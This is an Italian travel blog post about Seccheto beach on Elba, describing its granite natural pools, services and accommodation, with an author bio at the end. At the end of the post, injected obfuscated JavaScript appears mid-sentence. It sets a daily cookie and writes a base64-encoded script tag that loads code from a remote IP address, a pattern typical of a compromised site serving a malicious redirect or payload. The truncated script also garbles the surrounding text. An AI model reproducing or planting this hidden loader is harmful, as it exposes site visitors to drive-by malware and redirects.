Image

Immergiti nelle piscine naturali di granito a Seccheto

Seccheto: una delle località preferite per una vacanza tutta mare e relax

Tappa obbligatoria per chi viene in vacanza all’Isola d’Elba, Seccheto è una delle località più amate dal turismo elbano. Conosciuta sin dai tempi dei Romani, quando Seccheto all’Elba era un punto strategico per il trasporto di vino e blocchi di granito estratti nelle vicine cave, non lunghissima, la spiaggia di Seccheto si trova lungo la Costa del Sole ed è costituita da sabbia granulosa ideale per i bambini. Ma non è questo l’unico motivo per sceglierla per le vacanze in famiglia, dato che la spiaggia di Seccheto all’Elba è una delle più tranquille, a differenza delle vicine Cavoli e Fetovaia, è esposta ai venti meridionali che ne mitigano l’afa estiva e con un fondale che scende dolcemente.

Facilmente raggiungibile in auto o in bus, Seccheto è a circa sei chilometri da Marina di Campo e da Seccheto la spiaggia è vicinissima, basta attraversare a piedi un piccolo tratto di strada. Oltre ai numerosi hotel di Seccheto, ai comfort della zona balneare come bar, noleggio ombrelloni e sdraio, noleggio pedalò, si aggiungono le comodità dei servizi del paese come edicola, minimarket, farmacia, tabaccaio, parcheggio auto e ristoranti.

Seccheto all’Isola d’Elba è famosa per le sue piscine naturali costituite da una serie di lastroni di granito lisci alimentati continuamente dalle onde, perfetti per sdraiarsi a prendere il sole. In posizione strategica per poter raggiungere comodamente a piedi la spiaggia, gli alberghi a Seccheto o, in alternativa, gli appartamenti in affitto a Seccheto garantiscono comunque la giusta privacy e tranquillità grazie alla loro posizione sopraelevata rispetto alla strada. Per chi volesse scegliere un tipo di vacanza immersa nella natura, i campeggi vicino Seccheto sono una valida alternativa.

Si è detto che questo luogo è perfetto per le famiglie, ma attenzione: la spiaggia di Seccheto all’Isola d’Elba è molto amata anche dai nudisti, che solitamente si trovano al di là delle piscine. _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Share this post

Federica Mazzei

Elbana di nascita, giramondo per natura. Nata nel 1984 consegue nel 2007 una laurea triennale in Comunicazione sociale e nel 2009 una laurea magistrale con lode in Sistemi e progetti di comunicazione, prosegue il percorso formativo con una borsa di studio di due anni presso la Scuola Superiore Sant'Anna di Pisa (attività di supporto e potenziamento Ufficio Relazioni con il Pubblico, progettazione Piani integrati a livello di Zona distretto). Esperienze lavorative nel settore delle relazioni al pubblico, negli enti del terzo settore e nella comunicazione digitale.

Nessun commento

Aggiungi commento